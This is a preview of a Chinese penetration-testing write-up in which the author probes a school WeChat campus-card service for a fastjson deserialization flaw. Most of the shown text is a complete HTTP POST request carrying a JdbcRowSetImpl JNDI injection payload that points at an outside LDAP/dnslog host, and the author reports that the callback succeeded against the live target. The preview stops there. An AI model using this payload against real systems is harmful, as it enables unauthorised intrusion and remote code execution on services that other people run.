文章预览
关于JNDI注入一直都是在CTF中见到的,偶然在实战中碰到了一个fastjson,是一个公众号绑定校卡的点 通过burpsuite的插件扫到了存在fastjson的漏洞 通过下面payload去验证是否为误报 POST /baas/base/base/sqlQuery HTTP/ 1.1 Host: xxxxxxx Connection: close Content-Length: 111 Accept: application/json, text/javascript, */*; q= 0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/ 5.0 (Windows NT 10.0 ; Win 64 ; x 64 ) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/ 116.0 . 0.0 Safari/ 537.36 NetType/WIFI MicroMessenger/ 7.0 . 20.1781 ( 0 x 6700143 B) WindowsWechat( 0 x 63090 a 13 ) XWEB/ 9115 Flue Content-Type: application/json Origin: xxxxxxx Referer: xxxxxxx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q= 0.9 Cookie: JSESSIONID= 00 ED 21 A 4 EBE 658 A 4 D 2 B 423E77 CE 019 D 5 { "b" :{ "@type" : "com.sun.rowset.JdbcRowSetImpl" , "dataSourceName" : "ldap://dnslog" , "autoCommit" : true }} 请求dnslog是能够成功
………………………………